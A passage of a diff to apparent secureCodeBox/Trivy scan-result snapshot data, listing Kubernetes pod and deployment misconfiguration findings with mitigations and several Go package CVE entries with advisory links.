"An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/issues/56152", + }, + { + "type": "URL", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + }, + { + "type": "URL", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + }, + { + "type": "URL", + "value": "https://go.dev/cl/442235", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56152", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5873-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV003", "installedVersion": undefined, "packageName": undefined, @@ -53716,9 +53883,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "name": "Default capabilities not dropped(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should add 'ALL' to 'securityContext.capabilities.drop')", "references": [ { "type": "URL", @@ -53734,36 +53901,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV011", "installedVersion": undefined, "packageName": undefined, @@ -53774,9 +53912,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.cpu')", + "name": "CPU not limited(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.limits.cpu')", "references": [ { "type": "URL", @@ -53792,7 +53930,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV012", "installedVersion": undefined, "packageName": undefined, @@ -53803,9 +53941,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "name": "Runs as root user(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsNonRoot' to true)", "references": [ { "type": "URL", @@ -53821,28 +53959,28 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", ], }, "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.requests.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, ], "severity": "LOW", @@ -53850,7 +53988,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV016", "installedVersion": undefined, "packageName": undefined, @@ -53861,9 +53999,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.requests.memory')", + "name": "Memory requests not specified(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.requests.memory')", "references": [ { "type": "URL", @@ -53879,7 +54017,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV018", "installedVersion": undefined, "packageName": undefined, @@ -53890,9 +54028,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.memory')", + "name": "Memory not limited(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.limits.memory')", "references": [ { "type": "URL", @@ -53908,7 +54046,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV020", "installedVersion": undefined, "packageName": undefined, @@ -53919,9 +54057,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "name": "Runs with low user ID(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsUser' > 10000)", "references": [ { "type": "URL", @@ -53937,7 +54075,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV021", "installedVersion": undefined, "packageName": undefined, @@ -53948,9 +54086,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "name": "Runs with low group ID(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsGroup' > 10000)", "references": [ { "type": "URL", @@ -53966,36 +54104,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV106", "installedVersion": undefined, "packageName": undefined, @@ -54006,7 +54115,7 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", "references": [ @@ -54023,145 +54132,87 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0033", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", + "foundIn": "Target: 'manager' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-28948", + "installedVersion": "v3.0.0-20220512140231-539c8e751b99", + "packageName": "gopkg.in/yaml.v3", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0033", + "https://access.redhat.com/security/cve/CVE-2022-28948", + "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "https://github.com/go-yaml/yaml/issues/666", + "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "https://security.netapp.com/advisory/ntap-20220923-0006/", + "https://www.cve.org/CVERecord?id=CVE-2022-28948", ], }, - "category": "Misconfiguration", - "description": "Activate garbage collector on pod termination, as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --terminated-pod-gc-threshold to an appropriate threshold.", - "name": "Ensure that the --terminated-pod-gc-threshold argument is set as appropriate(Ensure that the --terminated-pod-gc-threshold argument is set as appropriate)", + "category": "Vulnerability", + "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": undefined, + "name": "crash when attempting to deserialize invalid input", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0033", + "value": "https://avd.aquasec.com/nvd/cve-2022-28948", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2022-28948", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0034", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0034", - ], - }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0034", + "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0038", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0038", - ], - }, - "category": "Misconfiguration", - "description": "Enable kubelet server certificate rotation on controller-manager.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --feature-gates parameter to include RotateKubeletServerCertificate=true .", - "name": "Ensure that the RotateKubeletServerCertificate argument is set to true(Ensure that the RotateKubeletServerCertificate argument is set to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0038", + "value": "https://github.com/go-yaml/yaml/issues/666", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", ], }, "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsUser' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], "severity": "LOW", @@ -54169,57 +54220,57 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", ], }, "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsGroup' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", ], }, "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.cpu')", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", @@ -54227,202 +54278,111 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", "installedVersion": undefined, "packageName": undefined, "references": [ "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", + "https://avd.aquasec.com/misconfig/ksv106", ], }, "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8911", + "installedVersion": "v1.35.9", + "packageName": "github.com/aws/aws-sdk-go", "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", + "https://access.redhat.com/security/cve/CVE-2020-8911", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8911", ], }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "category": "Vulnerability", + "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": undefined, + "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://avd.aquasec.com/nvd/cve-2020-8911", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://access.redhat.com/security/cve/CVE-2020-8911", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, 